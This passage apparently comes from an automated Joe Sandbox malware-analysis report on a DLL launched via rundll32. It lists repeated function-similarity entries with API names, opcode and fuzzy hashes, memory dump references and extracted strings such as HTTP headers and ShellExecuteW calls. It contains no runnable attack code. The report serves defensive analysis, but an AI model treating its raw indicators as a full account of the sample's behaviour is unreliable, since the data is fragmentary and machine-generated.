                                                                                    • Instruction Fuzzy Hash: 0521C432611E4482EB529F29D85039EB3A0FB89BF4F198711EA794B6E8DF7CC2448700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$??3@Free$??2@AllocFileFindNamePath
                                                                                    • String ID:
                                                                                    • API String ID: 772211780-0
                                                                                    • Opcode ID: f9574987d235c529e2b4a5f79013c743acc608ea97a4ad6ac219f98d4fdede78
                                                                                    • Instruction ID: 283ffb4ef057f0283fd59c714cbfe65b47d72467c2882de283dc062303e29699
                                                                                    • Opcode Fuzzy Hash: f9574987d235c529e2b4a5f79013c743acc608ea97a4ad6ac219f98d4fdede78
                                                                                    • Instruction Fuzzy Hash: 1221B832611A4482EB92DF29D84439EB3A0FB89BF4F198725E779476E9DF7CC6448700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$??3@Free$??2@AllocFileFindNamePath
                                                                                    • String ID:
                                                                                    • API String ID: 772211780-0
                                                                                    • Opcode ID: 307ce0f3569f6860fa341fe80190f4157af3b04d29387ea8d5fe3f277a62001a
                                                                                    • Instruction ID: d9e03fda3b1d153f0bd4bb02b331d59468f410aa3c35072f5ffbfd31d5bd1a6e
                                                                                    • Opcode Fuzzy Hash: 307ce0f3569f6860fa341fe80190f4157af3b04d29387ea8d5fe3f277a62001a
                                                                                    • Instruction Fuzzy Hash: CD21D632601A4482EB568F29D89139EB3A0FB88BF4F198715EA79476E8DF7CC644C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountTick$freemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 112427268-0
                                                                                    • Opcode ID: 40d9beaaacbcde50260c436ec66f3643f495edb07ad5aab697476aac6434d7f6
                                                                                    • Instruction ID: b8918b2958dc72fb2df8bfc42f6eb5cd02d312beeb31fdbe44136919b98f9138
                                                                                    • Opcode Fuzzy Hash: 40d9beaaacbcde50260c436ec66f3643f495edb07ad5aab697476aac6434d7f6
                                                                                    • Instruction Fuzzy Hash: 3021517261560987EFD78B24EC85BAF23A0B74C7C0F42E024F95682695DF38D75D8B02
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Initialize$DeleteEnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 3345835275-0
                                                                                    • Opcode ID: 342e2fd84596a913fc4e554fed418576577eb4ed1e3f0298ebe73fa484c4289a
                                                                                    • Instruction ID: bac7ba2d50b8a8327d60b40396a6a413962eafb144c30abffe047fc5a4d1e144
                                                                                    • Opcode Fuzzy Hash: 342e2fd84596a913fc4e554fed418576577eb4ed1e3f0298ebe73fa484c4289a
                                                                                    • Instruction Fuzzy Hash: 51212970605A4896FBD29F50EC543D873A8F74EBE4F588229EAA9062A5DF39C74DC700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _errno_msizememsetrealloc
                                                                                    • String ID:
                                                                                    • API String ID: 1716158884-0
                                                                                    • Opcode ID: cdc86eb51b19dd29fbdd1dbcc9e2dd10d7135d8ad8bd6beb6c08774733d5e7b7
                                                                                    • Instruction ID: eee6de8c671426a850027d5845b58404d35e5bb09185fe1037511193ebe898ed
                                                                                    • Opcode Fuzzy Hash: cdc86eb51b19dd29fbdd1dbcc9e2dd10d7135d8ad8bd6beb6c08774733d5e7b7
                                                                                    • Instruction Fuzzy Hash: 7201A536715648C1F9869B27A4043D99251AB8CBE0F1DD720BF6A07BCBDE3DC6418700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _errno$memmovememset
                                                                                    • String ID:
                                                                                    • API String ID: 390474681-0
                                                                                    • Opcode ID: 34773165fa903b58a8169a26407c6ce6a53d95ed58fc80f98c13fe875aa60091
                                                                                    • Instruction ID: 14b1c1fe1981e25254dae316b1258392d266da5cf9c387dbe4ce1a9d85b7c1af
                                                                                    • Opcode Fuzzy Hash: 34773165fa903b58a8169a26407c6ce6a53d95ed58fc80f98c13fe875aa60091
                                                                                    • Instruction Fuzzy Hash: 2401D631B1469C42FAE66B56F0003EE5250AB8CBD0F48D020BF4557B8FCE2ECA968740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$DeleteEnterFreeLeaveLibrary
                                                                                    • String ID:
                                                                                    • API String ID: 2347899730-0
                                                                                    • Opcode ID: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
                                                                                    • Instruction ID: 48e8189d87aa0b979fc36c7d6fe6748a55851d8ea4777fada0444d8c8a940578
                                                                                    • Opcode Fuzzy Hash: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
                                                                                    • Instruction Fuzzy Hash: 6E117033605B4897EB558F21E9443A97360FB4A7B5F1897249B690BAA0CF78D2798300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: File_swprintf_c_l$PointerRead
                                                                                    • String ID:
                                                                                    • API String ID: 1259558433-0
                                                                                    • Opcode ID: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
                                                                                    • Instruction ID: 41788915f12d7117270c0c242483de8f49aba279d1603b6e07884f1d05f749b7
                                                                                    • Opcode Fuzzy Hash: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
                                                                                    • Instruction Fuzzy Hash: 9B01F53172864881F7929B61AC407DBA3A1F74D7C4F65C022FA5543A64CF3DC748CB20
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: memmove
                                                                                    • String ID:
                                                                                    • API String ID: 2162964266-0
                                                                                    • Opcode ID: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
                                                                                    • Instruction ID: 461c31f9552aa3729a5e6565f135de1ccc8cc925f396947b96927f6322aea50e
                                                                                    • Opcode Fuzzy Hash: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
                                                                                    • Instruction Fuzzy Hash: A6014B72604B8486DA999F02B84439AA6A4F799FC0F58C034AF9A1BB1ACE7CC2518700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: wcsncmp$FromListPath
                                                                                    • String ID: http://$https://
                                                                                    • API String ID: 1354619976-1916535328
                                                                                    • Opcode ID: f0180345e040584d079c5b24169db75a70be302b2ca9e14ca998ae6b14b2d4e5
                                                                                    • Instruction ID: 3b4f654c0190b1c660da69d9b707c9435e3e8476667423005c0f2b5f6a7ba28a
                                                                                    • Opcode Fuzzy Hash: f0180345e040584d079c5b24169db75a70be302b2ca9e14ca998ae6b14b2d4e5
                                                                                    • Instruction Fuzzy Hash: 21F06D30314B4D81FBD3AB22ED807E92361A74DBC0F08D026BE128B681EE29C79DC701
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePath$BackslashModuleNameRemoveSpecmemmovememset
                                                                                    • String ID:
                                                                                    • API String ID: 1398880316-0
                                                                                    • Opcode ID: 124879481a9aa2e00d01ebae9109725b2fe3f2f688dd831a4adbc46c5dd73c81
                                                                                    • Instruction ID: 22643bada24b11d976684183b583204a4ee84c872d42e87ba640a329a3643701
                                                                                    • Opcode Fuzzy Hash: 124879481a9aa2e00d01ebae9109725b2fe3f2f688dd831a4adbc46c5dd73c81
                                                                                    • Instruction Fuzzy Hash: 14015E71214A8882EA60DB21F85539A6320F78A7A9F404221BAAD476E9DF3DC24DCB04
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180042715), ref: 0000000180042D94
                                                                                      • Part of subcall function 000000018001AD68: InitializeCriticalSection.KERNEL32(?,?,?,?,?,000000018001AFD5), ref: 000000018001ADCE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharCriticalInitializeMultiSectionWide
                                                                                    • String ID: Cache-Control: no-cache$Connection: Keep-Alive
                                                                                    • API String ID: 2071930665-2797312137
                                                                                    • Opcode ID: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
                                                                                    • Instruction ID: 06b1c2be51b69464b9694ee66dce0eee22d8a6c444c0793ba53430c965e4d999
                                                                                    • Opcode Fuzzy Hash: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
                                                                                    • Instruction Fuzzy Hash: 6971B172300E9886EB96DF26D4807DD3760FB89BD8F86C625BE2947B85CF31D6598304
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Xinvalid_argumentstd::_
                                                                                    • String ID: map/set<T> too long
                                                                                    • API String ID: 909987262-1285458680
                                                                                    • Opcode ID: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
                                                                                    • Instruction ID: b716ba77de4695a230c5cde56cb36caf30baef682964767987e615475274616d
                                                                                    • Opcode Fuzzy Hash: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
                                                                                    • Instruction Fuzzy Hash: 17419E32208F8881EAA2CF25E84039E73A4F399BE0F558225EF9D43B95DF39C556C740
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFindNamePathwcscmp
                                                                                    • String ID: RUNDLL32
                                                                                    • API String ID: 3222201028-252960710
                                                                                    • Opcode ID: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
                                                                                    • Instruction ID: 4f5a5794d41fc096d520f70cd288b3f3e4e93d0d03317b7f7fc332b0f1d573f2
                                                                                    • Opcode Fuzzy Hash: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
                                                                                    • Instruction Fuzzy Hash: 87412932711A5896EB919F39C84479C2360FB49BB8F548312EA3D47BE9DF34CA99C344
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • ShellExecuteW.SHELL32 ref: 000000018004AF73
                                                                                      • Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
                                                                                      • Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
                                                                                      • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
                                                                                      • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
                                                                                      • Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
                                                                                      • Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
                                                                                      • Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
                                                                                      • Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
                                                                                      • Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
                                                                                      • Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B
                                                                                      • Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA
                                                                                    • memset.MSVCRT ref: 000000018004AF8E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AuthorityCountCurrentProcess$ErrorExecuteInformationLastShellTickTokenmemsetsrand
                                                                                    • String ID: p
                                                                                    • API String ID: 526592482-2181537457
                                                                                    • Opcode ID: db20606bd2f8c5ddcc62ab015699e8350b9eea6392e973e239eb88e586f6bc5b
                                                                                    • Instruction ID: c7a46caf8343ac9de693e6305f929c410170157657da93c1511d6525c5ccc842
                                                                                    • Opcode Fuzzy Hash: db20606bd2f8c5ddcc62ab015699e8350b9eea6392e973e239eb88e586f6bc5b
                                                                                    • Instruction Fuzzy Hash: B221B632208F8885E7A1DF51F48078AB3A4F799BC4F158021BE8D43B59DF38C549CB44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • ShellExecuteW.SHELL32 ref: 000000018004B0BF
                                                                                      • Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
                                                                                      • Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
                                                                                      • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
                                                                                      • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
                                                                                      • Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
                                                                                      • Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
                                                                                      • Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
                                                                                      • Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
                                                                                      • Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
                                                                                      • Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B
                                                                                      • Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA
                                                                                    • memset.MSVCRT ref: 000000018004B0DA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AuthorityCountCurrentProcess$ErrorExecuteInformationLastShellTickTokenmemsetsrand
                                                                                    • String ID: p
                                                                                    • API String ID: 526592482-2181537457
                                                                                    • Opcode ID: f2d62255b16ca96ed2cbf9c0141287d8586ff51f1b7a2213e7ec1c807b59ad21
                                                                                    • Instruction ID: 630a19f9e7c8d33164371876bc9408f173fd4fcd3dffaf0243fab21a92527801
                                                                                    • Opcode Fuzzy Hash: f2d62255b16ca96ed2cbf9c0141287d8586ff51f1b7a2213e7ec1c807b59ad21
                                                                                    • Instruction Fuzzy Hash: E1217432204F8885E7A1DF61F48078AB7A4F788BC4F558121FE8883B5ADF38C654CB44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value
                                                                                    • String ID: MsgCenter$opentime_afterinstall
